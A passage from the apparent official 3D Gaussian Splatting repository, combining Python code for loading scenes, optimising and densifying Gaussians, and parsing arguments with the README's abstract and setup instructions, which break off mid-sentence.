np.zeros_like(xyz) elements = np.empty(xyz.shape[0], dtype=dtype) attributes = np.concatenate((xyz, normals, rgb), axis=1) elements[:] = list(map(tuple, attributes)) # Create the PlyData object and write to file vertex_element = PlyElement.describe(elements, 'vertex') ply_data = PlyData([vertex_element]) ply_data.write(path) def readColmapSceneInfo(path, images, eval, llffhold=8): try: cameras_extrinsic_file = os.path.join(path, "sparse/0", "images.bin") cameras_intrinsic_file = os.path.join(path, "sparse/0", "cameras.bin") cam_extrinsics = read_extrinsics_binary(cameras_extrinsic_file) cam_intrinsics = read_intrinsics_binary(cameras_intrinsic_file) except: cameras_extrinsic_file = os.path.join(path, "sparse/0", "images.txt") cameras_intrinsic_file = os.path.join(path, "sparse/0", "cameras.txt") cam_extrinsics = read_extrinsics_text(cameras_extrinsic_file) cam_intrinsics = read_intrinsics_text(cameras_intrinsic_file) reading_dir = "images" if images == None else images cam_infos_unsorted = readColmapCameras(cam_extrinsics=cam_extrinsics, cam_intrinsics=cam_intrinsics, images_folder=os.path.join(path, reading_dir)) cam_infos = sorted(cam_infos_unsorted.copy(), key = lambda x : x.image_name) if eval: train_cam_infos = [c for idx, c in enumerate(cam_infos) if idx % llffhold != 0] test_cam_infos = [c for idx, c in enumerate(cam_infos) if idx % llffhold == 0] else: train_cam_infos = cam_infos test_cam_infos = [] nerf_normalization = getNerfppNorm(train_cam_infos) ply_path = os.path.join(path, "sparse/0/points3D.ply") bin_path = os.path.join(path, "sparse/0/points3D.bin") txt_path = os.path.join(path, "sparse/0/points3D.txt") if not os.path.exists(ply_path): print("Converting point3d.bin to .ply, will happen only the first time you open the scene.") try: xyz, rgb, _ = read_points3D_binary(bin_path) except: xyz, rgb, _ = read_points3D_text(txt_path) storePly(ply_path, xyz, rgb) try: pcd = fetchPly(ply_path) except: pcd = None scene_info = SceneInfo(point_cloud=pcd, train_cameras=train_cam_infos, test_cameras=test_cam_infos, nerf_normalization=nerf_normalization, ply_path=ply_path) return scene_info def readCamerasFromTransforms(path, transformsfile, white_background, extension=".png"): cam_infos = [] with open(os.path.join(path, transformsfile)) as json_file: contents = json.load(json_file) fovx = contents["camera_angle_x"] frames = contents["frames"] for idx, frame in enumerate(frames): cam_name = os.path.join(path, frame["file_path"] + extension) # NeRF 'transform_matrix' is a camera-to-world transform c2w = np.array(frame["transform_matrix"]) # change from OpenGL/Blender camera axes (Y up, Z back) to COLMAP (Y down, Z forward) c2w[:3, 1:3] *= -1 # get the world-to-camera transform and set R, T w2c = np.linalg.inv(c2w) R = np.transpose(w2c[:3,:3]) # R is stored transposed due to 'glm' in CUDA code T = w2c[:3, 3] image_path = os.path.join(path, cam_name) image_name = Path(cam_name).stem image = Image.open(image_path) im_data = np.array(image.convert("RGBA")) bg = np.array([1,1,1]) if white_background else np.array([0, 0, 0]) norm_data = im_data / 255.0 arr = norm_data[:,:,:3] * norm_data[:, :, 3:4] + bg * (1 - norm_data[:, :, 3:4]) image = Image.fromarray(np.array(arr*255.0, dtype=np.byte), "RGB") fovy = focal2fov(fov2focal(fovx, image.size[0]), image.size[1]) FovY = fovy FovX = fovx cam_infos.append(CameraInfo(uid=idx, R=R, T=T, FovY=FovY, FovX=FovX, image=image, image_path=image_path, image_name=image_name, width=image.size[0], height=image.size[1])) return cam_infos def readNerfSyntheticInfo(path, white_background, eval, extension=".png"): print("Reading Training Transforms") train_cam_infos = readCamerasFromTransforms(path, "transforms_train.json", white_background, extension) print("Reading Test Transforms") test_cam_infos = readCamerasFromTransforms(path, "transforms_test.json", white_background, extension) if not eval: train_cam_infos.extend(test_cam_infos) test_cam_infos = [] nerf_normalization = getNerfppNorm(train_cam_infos) ply_path = os.path.join(path, "points3d.ply") if not os.path.exists(ply_path): # Since this data set has no colmap data, we start with random points num_pts = 100_000 print(f"Generating random point cloud ({num_pts})...") # We create random points inside the bounds of the synthetic Blender scenes xyz = np.random.random((num_pts, 3)) * 2.6 - 1.3 shs = np.random.random((num_pts, 3)) / 255.0 pcd = BasicPointCloud(points=xyz, colors=SH2RGB(shs), normals=np.zeros((num_pts, 3))) storePly(ply_path, xyz, SH2RGB(shs) * 255) try: pcd = fetchPly(ply_path) except: pcd = None scene_info = SceneInfo(point_cloud=pcd, train_cameras=train_cam_infos, test_cameras=test_cam_infos, nerf_normalization=nerf_normalization, ply_path=ply_path) return scene_info sceneLoadTypeCallbacks = { "Colmap": readColmapSceneInfo, "Blender" : readNerfSyntheticInfo } File: scene/gaussian_model.py # # Copyright (C) 2023, Inria # GRAPHDECO research group, https://team.inria.fr/graphdeco # All rights reserved. # # This software is free for non-commercial, research and evaluation use # under the terms of the LICENSE.md file. # # For inquiries contact [email protected] # import torch import numpy as np from utils.general_utils import inverse_sigmoid, get_expon_lr_func, build_rotation from torch import nn import os from utils.system_utils import mkdir_p from plyfile import PlyData, PlyElement from utils.sh_utils import RGB2SH from simple_knn._C import distCUDA2 from utils.graphics_utils import BasicPointCloud from utils.general_utils import strip_symmetric, build_scaling_rotation class GaussianModel: def setup_functions(self): def build_covariance_from_scaling_rotation(scaling, scaling_modifier, rotation): L = build_scaling_rotation(scaling_modifier * scaling, rotation) actual_covariance = L @ L.transpose(1, 2) symm = strip_symmetric(actual_covariance) return symm self.scaling_activation = torch.exp self.scaling_inverse_activation = torch.log self.covariance_activation = build_covariance_from_scaling_rotation self.opacity_activation = torch.sigmoid self.inverse_opacity_activation = inverse_sigmoid self.rotation_activation = torch.nn.functional.normalize def __init__(self, sh_degree : int): self.active_sh_degree = 0 self.max_sh_degree = sh_degree self._xyz = torch.empty(0) self._features_dc = torch.empty(0) self._features_rest = torch.empty(0) self._scaling = torch.empty(0) self._rotation = torch.empty(0) self._opacity = torch.empty(0) self.max_radii2D = torch.empty(0) self.xyz_gradient_accum = torch.empty(0) self.denom = torch.empty(0) self.optimizer = None self.percent_dense = 0 self.spatial_lr_scale = 0 self.setup_functions() def capture(self): return ( self.active_sh_degree, self._xyz, self._features_dc, self._features_rest, self._scaling, self._rotation, self._opacity, self.max_radii2D, self.xyz_gradient_accum, self.denom, self.optimizer.state_dict(), self.spatial_lr_scale, ) def restore(self, model_args, training_args): (self.active_sh_degree, self._xyz, self._features_dc, self._features_rest, self._scaling, self._rotation, self._opacity, self.max_radii2D, xyz_gradient_accum, denom, opt_dict, self.spatial_lr_scale) = model_args self.training_setup(training_args) self.xyz_gradient_accum = xyz_gradient_accum self.denom = denom self.optimizer.load_state_dict(opt_dict) @property def get_scaling(self): return self.scaling_activation(self._scaling) @property def get_rotation(self): return self.rotation_activation(self._rotation) @property def get_xyz(self): return self._xyz @property def get_features(self): features_dc = self._features_dc features_rest = self._features_rest return torch.cat((features_dc, features_rest), dim=1) @property def get_opacity(self): return self.opacity_activation(self._opacity) def get_covariance(self, scaling_modifier = 1): return self.covariance_activation(self.get_scaling, scaling_modifier, self._rotation) def oneupSHdegree(self): if self.active_sh_degree < self.max_sh_degree: self.active_sh_degree += 1 def create_from_pcd(self, pcd : BasicPointCloud, spatial_lr_scale : float): self.spatial_lr_scale = spatial_lr_scale fused_point_cloud = torch.tensor(np.asarray(pcd.points)).float().cuda() fused_color = RGB2SH(torch.tensor(np.asarray(pcd.colors)).float().cuda()) features = torch.zeros((fused_color.shape[0], 3, (self.max_sh_degree + 1) ** 2)).float().cuda() features[:, :3, 0 ] = fused_color features[:, 3:, 1:] = 0.0 print("Number of points at initialisation : ", fused_point_cloud.shape[0]) dist2 = torch.clamp_min(distCUDA2(torch.from_numpy(np.asarray(pcd.points)).float().cuda()), 0.0000001) scales = torch.log(torch.sqrt(dist2))[...,None].repeat(1, 3) rots = torch.zeros((fused_point_cloud.shape[0], 4), device="cuda") rots[:, 0] = 1 opacities = inverse_sigmoid(0.1 * torch.ones((fused_point_cloud.shape[0], 1), dtype=torch.float, device="cuda")) self._xyz = nn.Parameter(fused_point_cloud.requires_grad_(True)) self._features_dc = nn.Parameter(features[:,:,0:1].transpose(1, 2).contiguous().requires_grad_(True)) self._features_rest = nn.Parameter(features[:,:,1:].transpose(1, 2).contiguous().requires_grad_(True)) self._scaling = nn.Parameter(scales.requires_grad_(True)) self._rotation = nn.Parameter(rots.requires_grad_(True)) self._opacity = nn.Parameter(opacities.requires_grad_(True)) self.max_radii2D = torch.zeros((self.get_xyz.shape[0]), device="cuda") def training_setup(self, training_args): self.percent_dense = training_args.percent_dense self.xyz_gradient_accum = torch.zeros((self.get_xyz.shape[0], 1), device="cuda") self.denom = torch.zeros((self.get_xyz.shape[0], 1), device="cuda") l = [ {'params': [self._xyz], 'lr': training_args.position_lr_init * self.spatial_lr_scale, "name": "xyz"}, {'params': [self._features_dc], 'lr': training_args.feature_lr, "name": "f_dc"}, {'params': [self._features_rest], 'lr': training_args.feature_lr / 20.0, "name": "f_rest"}, {'params': [self._opacity], 'lr': training_args.opacity_lr, "name": "opacity"}, {'params': [self._scaling], 'lr': training_args.scaling_lr, "name": "scaling"}, {'params': [self._rotation], 'lr': training_args.rotation_lr, "name": "rotation"} ] self.optimizer = torch.optim.Adam(l, lr=0.0, eps=1e-15) self.xyz_scheduler_args = get_expon_lr_func(lr_init=training_args.position_lr_init*self.spatial_lr_scale, lr_final=training_args.position_lr_final*self.spatial_lr_scale, lr_delay_mult=training_args.position_lr_delay_mult, max_steps=training_args.position_lr_max_steps) def update_learning_rate(self, iteration): ''' Learning rate scheduling per step ''' for param_group in self.optimizer.param_groups: if param_group["name"] == "xyz": lr = self.xyz_scheduler_args(iteration) param_group['lr'] = lr return lr def construct_list_of_attributes(self): l = ['x', 'y', 'z', 'nx', 'ny', 'nz'] # All channels except the 3 DC for i in range(self._features_dc.shape[1]*self._features_dc.shape[2]): l.append('f_dc_{}'.format(i)) for i in range(self._features_rest.shape[1]*self._features_rest.shape[2]): l.append('f_rest_{}'.format(i)) l.append('opacity') for i in range(self._scaling.shape[1]): l.append('scale_{}'.format(i)) for i in range(self._rotation.shape[1]): l.append('rot_{}'.format(i)) return l def save_ply(self, path): mkdir_p(os.path.dirname(path)) xyz = self._xyz.detach().cpu().numpy() normals = np.zeros_like(xyz) f_dc = self._features_dc.detach().transpose(1, 2).flatten(start_dim=1).contiguous().cpu().numpy() f_rest = self._features_rest.detach().transpose(1, 2).flatten(start_dim=1).contiguous().cpu().numpy() opacities = self._opacity.detach().cpu().numpy() scale = self._scaling.detach().cpu().numpy() rotation = self._rotation.detach().cpu().numpy() dtype_full = [(attribute, 'f4') for attribute in self.construct_list_of_attributes()] elements = np.empty(xyz.shape[0], dtype=dtype_full) attributes = np.concatenate((xyz, normals, f_dc, f_rest, opacities, scale, rotation), axis=1) elements[:] = list(map(tuple, attributes)) el = PlyElement.describe(elements, 'vertex') PlyData([el]).write(path) def reset_opacity(self): opacities_new = inverse_sigmoid(torch.min(self.get_opacity, torch.ones_like(self.get_opacity)*0.01)) optimizable_tensors = self.replace_tensor_to_optimizer(opacities_new, "opacity") self._opacity = optimizable_tensors["opacity"] def load_ply(self, path): plydata = PlyData.read(path) xyz = np.stack((np.asarray(plydata.elements[0]["x"]), np.asarray(plydata.elements[0]["y"]), np.asarray(plydata.elements[0]["z"])), axis=1) opacities = np.asarray(plydata.elements[0]["opacity"])[..., np.newaxis] features_dc = np.zeros((xyz.shape[0], 3, 1)) features_dc[:, 0, 0] = np.asarray(plydata.elements[0]["f_dc_0"]) features_dc[:, 1, 0] = np.asarray(plydata.elements[0]["f_dc_1"]) features_dc[:, 2, 0] = np.asarray(plydata.elements[0]["f_dc_2"]) extra_f_names = [p.name for p in plydata.elements[0].properties if p.name.startswith("f_rest_")] extra_f_names = sorted(extra_f_names, key = lambda x: int(x.split('_')[-1])) assert len(extra_f_names)==3*(self.max_sh_degree + 1) ** 2 - 3 features_extra = np.zeros((xyz.shape[0], len(extra_f_names))) for idx, attr_name in enumerate(extra_f_names): features_extra[:, idx] = np.asarray(plydata.elements[0][attr_name]) # Reshape (P,F*SH_coeffs) to (P, F, SH_coeffs except DC) features_extra = features_extra.reshape((features_extra.shape[0], 3, (self.max_sh_degree + 1) ** 2 - 1)) scale_names = [p.name for p in plydata.elements[0].properties if p.name.startswith("scale_")] scale_names = sorted(scale_names, key = lambda x: int(x.split('_')[-1])) scales = np.zeros((xyz.shape[0], len(scale_names))) for idx, attr_name in enumerate(scale_names): scales[:, idx] = np.asarray(plydata.elements[0][attr_name]) rot_names = [p.name for p in plydata.elements[0].properties if p.name.startswith("rot")] rot_names = sorted(rot_names, key = lambda x: int(x.split('_')[-1])) rots = np.zeros((xyz.shape[0], len(rot_names))) for idx, attr_name in enumerate(rot_names): rots[:, idx] = np.asarray(plydata.elements[0][attr_name]) self._xyz = nn.Parameter(torch.tensor(xyz, dtype=torch.float, device="cuda").requires_grad_(True)) self._features_dc = nn.Parameter(torch.tensor(features_dc, dtype=torch.float, device="cuda").transpose(1, 2).contiguous().requires_grad_(True)) self._features_rest = nn.Parameter(torch.tensor(features_extra, dtype=torch.float, device="cuda").transpose(1, 2).contiguous().requires_grad_(True)) self._opacity = nn.Parameter(torch.tensor(opacities, dtype=torch.float, device="cuda").requires_grad_(True)) self._scaling = nn.Parameter(torch.tensor(scales, dtype=torch.float, device="cuda").requires_grad_(True)) self._rotation = nn.Parameter(torch.tensor(rots, dtype=torch.float, device="cuda").requires_grad_(True)) self.active_sh_degree = self.max_sh_degree def replace_tensor_to_optimizer(self, tensor, name): optimizable_tensors = {} for group in self.optimizer.param_groups: if group["name"] == name: stored_state = self.optimizer.state.get(group['params'][0], None) stored_state["exp_avg"] = torch.zeros_like(tensor) stored_state["exp_avg_sq"] = torch.zeros_like(tensor) del self.optimizer.state[group['params'][0]] group["params"][0] = nn.Parameter(tensor.requires_grad_(True)) self.optimizer.state[group['params'][0]] = stored_state optimizable_tensors[group["name"]] = group["params"][0] return optimizable_tensors def _prune_optimizer(self, mask): optimizable_tensors = {} for group in self.optimizer.param_groups: stored_state = self.optimizer.state.get(group['params'][0], None) if stored_state is not None: stored_state["exp_avg"] = stored_state["exp_avg"][mask] stored_state["exp_avg_sq"] = stored_state["exp_avg_sq"][mask] del self.optimizer.state[group['params'][0]] group["params"][0] = nn.Parameter((group["params"][0][mask].requires_grad_(True))) self.optimizer.state[group['params'][0]] = stored_state optimizable_tensors[group["name"]] = group["params"][0] else: group["params"][0] = nn.Parameter(group["params"][0][mask].requires_grad_(True)) optimizable_tensors[group["name"]] = group["params"][0] return optimizable_tensors def prune_points(self, mask): valid_points_mask = ~mask optimizable_tensors = self._prune_optimizer(valid_points_mask) self._xyz = optimizable_tensors["xyz"] self._features_dc = optimizable_tensors["f_dc"] self._features_rest = optimizable_tensors["f_rest"] self._opacity = optimizable_tensors["opacity"] self._scaling = optimizable_tensors["scaling"] self._rotation = optimizable_tensors["rotation"] self.xyz_gradient_accum = self.xyz_gradient_accum[valid_points_mask] self.denom = self.denom[valid_points_mask] self.max_radii2D = self.max_radii2D[valid_points_mask] def cat_tensors_to_optimizer(self, tensors_dict): optimizable_tensors = {} for group in self.optimizer.param_groups: assert len(group["params"]) == 1 extension_tensor = tensors_dict[group["name"]] stored_state = self.optimizer.state.get(group['params'][0], None) if stored_state is not None: stored_state["exp_avg"] = torch.cat((stored_state["exp_avg"], torch.zeros_like(extension_tensor)), dim=0) stored_state["exp_avg_sq"] = torch.cat((stored_state["exp_avg_sq"], torch.zeros_like(extension_tensor)), dim=0) del self.optimizer.state[group['params'][0]] group["params"][0] = nn.Parameter(torch.cat((group["params"][0], extension_tensor), dim=0).requires_grad_(True)) self.optimizer.state[group['params'][0]] = stored_state optimizable_tensors[group["name"]] = group["params"][0] else: group["params"][0] = nn.Parameter(torch.cat((group["params"][0], extension_tensor), dim=0).requires_grad_(True)) optimizable_tensors[group["name"]] = group["params"][0] return optimizable_tensors def densification_postfix(self, new_xyz, new_features_dc, new_features_rest, new_opacities, new_scaling, new_rotation): d = {"xyz": new_xyz, "f_dc": new_features_dc, "f_rest": new_features_rest, "opacity": new_opacities, "scaling" : new_scaling, "rotation" : new_rotation} optimizable_tensors = self.cat_tensors_to_optimizer(d) self._xyz = optimizable_tensors["xyz"] self._features_dc = optimizable_tensors["f_dc"] self._features_rest = optimizable_tensors["f_rest"] self._opacity = optimizable_tensors["opacity"] self._scaling = optimizable_tensors["scaling"] self._rotation = optimizable_tensors["rotation"] self.xyz_gradient_accum = torch.zeros((self.get_xyz.shape[0], 1), device="cuda") self.denom = torch.zeros((self.get_xyz.shape[0], 1), device="cuda") self.max_radii2D = torch.zeros((self.get_xyz.shape[0]), device="cuda") def densify_and_split(self, grads, grad_threshold, scene_extent, N=2): n_init_points = self.get_xyz.shape[0] # Extract points that satisfy the gradient condition padded_grad = torch.zeros((n_init_points), device="cuda") padded_grad[:grads.shape[0]] = grads.squeeze() selected_pts_mask = torch.where(padded_grad >= grad_threshold, True, False) selected_pts_mask = torch.logical_and(selected_pts_mask, torch.max(self.get_scaling, dim=1).values > self.percent_dense*scene_extent) stds = self.get_scaling[selected_pts_mask].repeat(N,1) means =torch.zeros((stds.size(0), 3),device="cuda") samples = torch.normal(mean=means, std=stds) rots = build_rotation(self._rotation[selected_pts_mask]).repeat(N,1,1) new_xyz = torch.bmm(rots, samples.unsqueeze(-1)).squeeze(-1) + self.get_xyz[selected_pts_mask].repeat(N, 1) new_scaling = self.scaling_inverse_activation(self.get_scaling[selected_pts_mask].repeat(N,1) / (0.8*N)) new_rotation = self._rotation[selected_pts_mask].repeat(N,1) new_features_dc = self._features_dc[selected_pts_mask].repeat(N,1,1) new_features_rest = self._features_rest[selected_pts_mask].repeat(N,1,1) new_opacity = self._opacity[selected_pts_mask].repeat(N,1) self.densification_postfix(new_xyz, new_features_dc, new_features_rest, new_opacity, new_scaling, new_rotation) prune_filter = torch.cat((selected_pts_mask, torch.zeros(N * selected_pts_mask.sum(), device="cuda", dtype=bool))) self.prune_points(prune_filter) def densify_and_clone(self, grads, grad_threshold, scene_extent): # Extract points that satisfy the gradient condition selected_pts_mask = torch.where(torch.norm(grads, dim=-1) >= grad_threshold, True, False) selected_pts_mask = torch.logical_and(selected_pts_mask, torch.max(self.get_scaling, dim=1).values <= self.percent_dense*scene_extent) new_xyz = self._xyz[selected_pts_mask] new_features_dc = self._features_dc[selected_pts_mask] new_features_rest = self._features_rest[selected_pts_mask] new_opacities = self._opacity[selected_pts_mask] new_scaling = self._scaling[selected_pts_mask] new_rotation = self._rotation[selected_pts_mask] self.densification_postfix(new_xyz, new_features_dc, new_features_rest, new_opacities, new_scaling, new_rotation) def densify_and_prune(self, max_grad, min_opacity, extent, max_screen_size): grads = self.xyz_gradient_accum / self.denom grads[grads.isnan()] = 0.0 self.densify_and_clone(grads, max_grad, extent) self.densify_and_split(grads, max_grad, extent) prune_mask = (self.get_opacity < min_opacity).squeeze() if max_screen_size: big_points_vs = self.max_radii2D > max_screen_size big_points_ws = self.get_scaling.max(dim=1).values > 0.1 * extent prune_mask = torch.logical_or(torch.logical_or(prune_mask, big_points_vs), big_points_ws) self.prune_points(prune_mask) torch.cuda.empty_cache() def add_densification_stats(self, viewspace_point_tensor, update_filter): self.xyz_gradient_accum[update_filter] += torch.norm(viewspace_point_tensor.grad[update_filter,:2], dim=-1, keepdim=True) self.denom[update_filter] += 1 File: arguments/__init__.py # # Copyright (C) 2023, Inria # GRAPHDECO research group, https://team.inria.fr/graphdeco # All rights reserved. # # This software is free for non-commercial, research and evaluation use # under the terms of the LICENSE.md file. # # For inquiries contact [email protected] # from argparse import ArgumentParser, Namespace import sys import os class GroupParams: pass class ParamGroup: def __init__(self, parser: ArgumentParser, name : str, fill_none = False): group = parser.add_argument_group(name) for key, value in vars(self).items(): shorthand = False if key.startswith("_"): shorthand = True key = key[1:] t = type(value) value = value if not fill_none else None if shorthand: if t == bool: group.add_argument("--" + key, ("-" + key[0:1]), default=value, action="store_true") else: group.add_argument("--" + key, ("-" + key[0:1]), default=value, type=t) else: if t == bool: group.add_argument("--" + key, default=value, action="store_true") else: group.add_argument("--" + key, default=value, type=t) def extract(self, args): group = GroupParams() for arg in vars(args).items(): if arg[0] in vars(self) or ("_" + arg[0]) in vars(self): setattr(group, arg[0], arg[1]) return group class ModelParams(ParamGroup): def __init__(self, parser, sentinel=False): self.sh_degree = 3 self._source_path = "" self._model_path = "" self._images = "images" self._resolution = -1 self._white_background = False self.data_device = "cuda" self.eval = False super().__init__(parser, "Loading Parameters", sentinel) def extract(self, args): g = super().extract(args) g.source_path = os.path.abspath(g.source_path) return g class PipelineParams(ParamGroup): def __init__(self, parser): self.convert_SHs_python = False self.compute_cov3D_python = False self.debug = False super().__init__(parser, "Pipeline Parameters") class OptimizationParams(ParamGroup): def __init__(self, parser): self.iterations = 30_000 self.position_lr_init = 0.00016 self.position_lr_final = 0.0000016 self.position_lr_delay_mult = 0.01 self.position_lr_max_steps = 30_000 self.feature_lr = 0.0025 self.opacity_lr = 0.05 self.scaling_lr = 0.005 self.rotation_lr = 0.001 self.percent_dense = 0.01 self.lambda_dssim = 0.2 self.densification_interval = 100 self.opacity_reset_interval = 3000 self.densify_from_iter = 500 self.densify_until_iter = 15_000 self.densify_grad_threshold = 0.0002 self.random_background = False super().__init__(parser, "Optimization Parameters") def get_combined_args(parser : ArgumentParser): cmdlne_string = sys.argv[1:] cfgfile_string = "Namespace()" args_cmdline = parser.parse_args(cmdlne_string) try: cfgfilepath = os.path.join(args_cmdline.model_path, "cfg_args") print("Looking for config file in", cfgfilepath) with open(cfgfilepath) as cfg_file: print("Config file found: {}".format(cfgfilepath)) cfgfile_string = cfg_file.read() except TypeError: print("Config file not found at") pass args_cfgfile = eval(cfgfile_string) merged_dict = vars(args_cfgfile).copy() for k,v in vars(args_cmdline).items(): if v != None: merged_dict[k] = v return Namespace(**merged_dict)
# 3D Gaussian Splatting for Real-Time Radiance Field Rendering Bernhard Kerbl*, Georgios Kopanas*, Thomas Leimkühler, George Drettakis (* indicates equal contribution)<br> | [Webpage](https://repo-sam.inria.fr/fungraph/3d-gaussian-splatting/) | [Full Paper](https://repo-sam.inria.fr/fungraph/3d-gaussian-splatting/3d_gaussian_splatting_high.pdf) | [Video](https://youtu.be/T_kXY43VZnk) | [Other GRAPHDECO Publications](http://www-sop.inria.fr/reves/publis/gdindex.php) | [FUNGRAPH project page](https://fungraph.inria.fr) |<br> | [T&T+DB COLMAP (650MB)](https://repo-sam.inria.fr/fungraph/3d-gaussian-splatting/datasets/input/tandt_db.zip) | [Pre-trained Models (14 GB)](https://repo-sam.inria.fr/fungraph/3d-gaussian-splatting/datasets/pretrained/models.zip) | [Viewers for Windows (60MB)](https://repo-sam.inria.fr/fungraph/3d-gaussian-splatting/binaries/viewers.zip) | [Evaluation Images (7 GB)](https://repo-sam.inria.fr/fungraph/3d-gaussian-splatting/evaluation/images.zip) |<br> ![Teaser image](assets/teaser.png) This repository contains the official authors implementation associated with the paper "3D Gaussian Splatting for Real-Time Radiance Field Rendering", which can be found [here](https://repo-sam.inria.fr/fungraph/3d-gaussian-splatting/). We further provide the reference images used to create the error metrics reported in the paper, as well as recently created, pre-trained models. <a href="https://www.inria.fr/"><img height="100" src="assets/logo_inria.png"> </a> <a href="https://univ-cotedazur.eu/"><img height="100" src="assets/logo_uca.png"> </a> <a href="https://www.mpi-inf.mpg.de"><img height="100" src="assets/logo_mpi.png"> </a> <a href="https://team.inria.fr/graphdeco/"> <img style="width:100%;" src="assets/logo_graphdeco.png"></a> Abstract: *Radiance Field methods have recently revolutionized novel-view synthesis of scenes captured with multiple photos or videos. However, achieving high visual quality still requires neural networks that are costly to train and render, while recent faster methods inevitably trade off speed for quality. For unbounded and complete scenes (rather than isolated objects) and 1080p resolution rendering, no current method can achieve real-time display rates. We introduce three key elements that allow us to achieve state-of-the-art visual quality while maintaining competitive training times and importantly allow high-quality real-time (≥ 30 fps) novel-view synthesis at 1080p resolution. First, starting from sparse points produced during camera calibration, we represent the scene with 3D Gaussians that preserve desirable properties of continuous volumetric radiance fields for scene optimization while avoiding unnecessary computation in empty space; Second, we perform interleaved optimization/density control of the 3D Gaussians, notably optimizing anisotropic covariance to achieve an accurate representation of the scene; Third, we develop a fast visibility-aware rendering algorithm that supports anisotropic splatting and both accelerates training and allows realtime rendering. We demonstrate state-of-the-art visual quality and real-time rendering on several established datasets.* <section class="section" id="BibTeX"> <div class="container is-max-desktop content"> <h2 class="title">BibTeX</h2> <pre><code>@Article{kerbl3Dgaussians, author = {Kerbl, Bernhard and Kopanas, Georgios and Leimk{\"u}hler, Thomas and Drettakis, George}, title = {3D Gaussian Splatting for Real-Time Radiance Field Rendering}, journal = {ACM Transactions on Graphics}, number = {4}, volume = {42}, month = {July}, year = {2023}, url = {https://repo-sam.inria.fr/fungraph/3d-gaussian-splatting/} }</code></pre> </div> </section> ## Funding and Acknowledgments This research was funded by the ERC Advanced grant FUNGRAPH No 788065. The authors are grateful to Adobe for generous donations, the OPAL infrastructure from Université Côte d’Azur and for the HPC resources from GENCI–IDRIS (Grant 2022-AD011013409). The authors thank the anonymous reviewers for their valuable feedback, P. Hedman and A. Tewari for proofreading earlier drafts also T. Müller, A. Yu and S. Fridovich-Keil for helping with the comparisons. ## Step-by-step Tutorial Jonathan Stephens made a fantastic step-by-step tutorial for setting up Gaussian Splatting on your machine, along with instructions for creating usable datasets from videos. If the instructions below are too dry for you, go ahead and check it out [here](https://www.youtube.com/watch?v=UXtuigy_wYc). ## Colab User [camenduru](https://github.com/camenduru) was kind enough to provide a Colab template that uses this repo's source (status: August 2023!) for quick and easy access to the method. Please check it out [here](https://github.com/camenduru/gaussian-splatting-colab). ## Cloning the Repository The repository contains submodules, thus please check it out with ```shell # SSH git clone [email protected]:graphdeco-inria/gaussian-splatting.git --recursive ``` or ```shell # HTTPS git clone https://github.com/graphdeco-inria/gaussian-splatting --recursive ``` ## Overview The codebase has 4 main components: - A PyTorch-based optimizer to produce a 3D Gaussian model from SfM inputs - A network viewer that allows to connect to and visualize the optimization process - An OpenGL-based real-time viewer to render trained models in real-time. - A script to help you turn your own images into optimization-ready SfM data sets The components have different requirements w.r.t. both hardware and software. They have been tested on Windows 10 and Ubuntu Linux 22.04. Instructions for setting up and running each of them are found in the sections below. ## NEW FEATURES ! We have limited resources for maintaining and updating the code. However, we have added a few new features since the original release that are inspired by some of the excellent work many other researchers have been doing on 3DGS. We will be adding other features within the ability of our resources. Update of Sept. 3rd 2024: We placed the new features in the `dev` branch until we have finished resolving the following issues: [#955](https://github.com/graphdeco-inria/gaussian-splatting/issues/955), [#962](https://github.com/graphdeco-inria/gaussian-splatting/issues/962). Update of August 2024: We have added/corrected the following features: [Depth regularization](#depth-regularization) for training, [anti aliasing](#anti-aliasing) and [exposure compensation](#exposure-compensation). We have enhanced the SIBR real time viewer by correcting bugs and adding features in the [Top View](#sibr:-top-view) that allows visualization of input and user cameras. Please note that it is currently not possible to use depth regularization with the training speed acceleration since they use different rasterizer versions. Update of Spring 2024: Orange Labs has kindly added [OpenXR support](#openXR-support) for VR viewing. ## Optimizer The optimizer uses PyTorch and CUDA extensions in a Python environment to produce trained models. ### Hardware Requirements - CUDA-ready GPU with Compute Capability 7.0+ - 24 GB VRAM (to train to paper evaluation quality) - Please see FAQ for smaller VRAM configurations ### Software Requirements - Conda (recommended for easy setup) - C++ Compiler for PyTorch extensions (we used Visual Studio 2019 for Windows) - CUDA SDK 11 for PyTorch extensions, install *after* Visual Studio (we used 11.8, **known issues with 11.6**) - C++ Compiler and CUDA SDK must be compatible ### Setup #### Local Setup Our default, provided install method is based on Conda package and environment management: ```shell SET DISTUTILS_USE_SDK=1 # Windows only conda env create --file environment.yml conda activate gaussian_splatting ``` Please note that this process assumes that you have CUDA SDK **11** installed, not **12**. For modifications, see below. Tip: Downloading packages and creating a new environment with Conda can require a significant amount of disk space. By default, Conda will use the main system hard drive. You can avoid this by specifying a different package download location and an environment on a different drive: ```shell conda config --add pkgs_dirs <Drive>/<pkg_path> conda env create --file environment.yml --prefix <Drive>/<env_path>/gaussian_splatting conda activate <Drive>/<env_path>/gaussian_splatting ``` #### Modifications If you can afford the disk space, we recommend using our environment files for setting up a training environment identical to ours. If you want to make modifications, please note that major version changes might affect the results of our method. However, our (limited) experiments suggest that the codebase works just fine inside a more up-to-date environment (Python 3.8, PyTorch 2.0.0, CUDA 12). Make sure to create an environment where PyTorch and its CUDA runtime version match and the installed CUDA SDK has no major version difference with PyTorch's CUDA version. #### Known Issues Some users experience problems building the submodules on Windows (```cl.exe: File not found``` or similar). Please consider the workaround for this problem from the FAQ. ### Running To run the optimizer, simply use ```shell python train.py -s <path to COLMAP or NeRF Synthetic dataset> ``` <details> <summary><span style="font-weight: bold;">Command Line Arguments for train.py</span></summary> #### --source_path / -s Path to the source directory containing a COLMAP or Synthetic NeRF data set. #### --model_path / -m Path where the trained model should be stored (```output/<random>``` by default). #### --images / -i Alternative subdirectory for COLMAP images (```images``` by default). #### --eval Add this flag to use a MipNeRF360-style training/test split for evaluation. #### --resolution / -r Specifies resolution of the loaded images before training. If provided ```1, 2, 4``` or ```8```, uses original, 1/2, 1/4 or 1/8 resolution, respectively. For all other values, rescales the width to the given number while maintaining image aspect. **If not set and input image width exceeds 1.6K pixels, inputs are automatically rescaled to this target.** #### --data_device Specifies where to put the source image data, ```cuda``` by default, recommended to use ```cpu``` if training on large/high-resolution dataset, will reduce VRAM consumption, but slightly slow down training. Thanks to [HrsPythonix](https://github.com/HrsPythonix). #### --white_background / -w Add this flag to use white background instead of black (default), e.g., for evaluation of NeRF Synthetic dataset. #### --sh_degree Order of spherical harmonics to be used (no larger than 3). ```3``` by default. #### --convert_SHs_python Flag to make pipeline compute forward and backward of SHs with PyTorch instead of ours. #### --convert_cov3D_python Flag to make pipeline compute forward and backward of the 3D covariance with PyTorch instead 